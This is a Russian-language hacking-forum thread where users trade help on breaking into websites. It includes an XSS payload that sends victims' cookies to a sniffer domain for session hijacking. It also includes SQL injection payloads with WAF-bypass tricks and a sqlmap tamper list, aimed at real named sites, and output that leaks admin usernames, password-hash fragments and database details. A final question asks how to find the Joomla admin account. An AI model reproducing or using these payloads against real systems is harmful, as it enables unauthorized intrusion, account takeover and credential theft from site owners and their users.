Эксплуатирую XSS и тут появился такой вопрос. Отправляю ссылку жертве с этим кодом document.location.replace(%27http://доменснифера.ком/sniff.php?с=doсument.сookie%27) и в логах появляется это - %C3%B1=do%C3%B1ument.%C3%B1ookie Все делаю как надо, а куки левые приходят, вставлял их в браузер и не получилось зайти от админа. Подскажите, в чем загвоздка?
у вас неверный код, который отправляет куки на сниффер. да еще и с русскими буквами внутри. прочитайте статью про XSS в разделе статей, там корректные примеры
Нашел сканером на одном сайте уязвимость, сканер проверил подтвердил и выдал sql-injection Spoiler: POST параметр: Code: Home%5bokno%5d%5b%5d=-1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(110)%2cCHAR(115)%2cCHAR(124)%2cCHAR(124)%2cCHAR(49)%2cCHAR(49)%2cCHAR(49)%2cCHAR(53)%2cCHAR(56)%2cCHAR(54)%2cCHAR(49)%2cCHAR(52)%2cCHAR(54)%2cCHAR(57)%2cCHAR(124)%2cCHAR(124)%2cCHAR(110)%2cCHAR(115)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%22 То есть: Code: Home[okno][]=-1"+and+6=3+or+1=1+(SELECT+1+and+ROW(1,1)>(SELECT+COUNT(*),CONCAT(ns||1115861469||ns,0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)+" Какие параметры указать в tamper? Пробовал between (вплоть до space2plus.py) как правильнее будет? P.S> Походу это я что то косячу... Погуглил прочитал что некоторые сразу все указывают, типо: Code: tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor От этого же может и не быть результата? И как правильнее выяснить какой именно тебе использовать?
Что бы сканер не писал,не факт что это Sql Inj . Сам по себе знаю,тоже думал SQL inj,а оказалось это сканер так подумал .
Что интересного можно узнать через уязвимость, где позволяется юзать функции без аргументов? какие есть интересные функции для данного случая?
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^ ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^ ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^ ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^ ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^ ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^ ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^ ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^ ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^ ^^^^^^^#####^^^############^^##^^^^ ^^^^^^^^^^##^^^^##^^^^######^^^^^^^ ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^ ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^ ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^ ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^ ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^ ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
Code: Запрос: 1" and(UpdateXML(0x03b,concat(0x3b,(select table_name FROM information_schema.tables limit 1,1)),0x03b))=" Результат: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ';COLLATIONS' Как автоматизировать сборку таблиц и колонок? Сколько искал в основном все под win либо не подходит
Не совсем понял пример про ВАФ. Нашел свой вариант - Code: http://empleos.net/v2_candidatos_buscarVacantes.php?filtro[Claves]=12&filtro[Area]=43 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--+&filtro[Pais]=20&filtro[Estado]=416&filtro[Desde]=2015-11-25&filtro[Hasta]=2015-11-28 ВАФ в данном случае срабатывает на union, обходится элементарно. Но есть "но" - через order by получается что 14 колонок, но при попытке вывода что выше написал - "different number of columns". Видимо не так что-то делаю.
Как вывести всю информацию, если вывод идет через ошибку, максимум могу посмотреть 30 символов... Например: 1105 - XPATH syntax error: ':1:admin:$2y$10$l9rcQOpA52n9' SQL=SELECT f.*,al.*,
Code: http://kvestsetevichok.ru/index.php?no_html=1&tmpl=component&option=com_surveyforce&task=survey.SF_ajaxAction [POST]action=next&survey=1&start_id=21133&user_id=449c373991919e6a22eca19c18e4b11c&quest_id[]=21 or (select count(*) from information_schema.columns group by concat((select concat_ws(0x3a,substring(username,1,50),substring(password,1,50)) from nvehp_users limit 0,1),0x3a,floor(rand(0)*2)))--&answer[]=152 Duplicate entry 'main:$2y$10$I4IqeXwMb5JkzFTTvEXQW.r71Nq/14JJgiIk75jsSK1:1' for key 'group_key' Duplicate entry '83195:1' for key 'group_key' Duplicate entry 'sergrus_kvest15@localhost::5.5.36-34.0-632.prec::sergrus_kvest15'
какая колонка в таблице %_users определяет админа сайта в послених версиях джумлы? в предыдущих было usertype=Super Administrator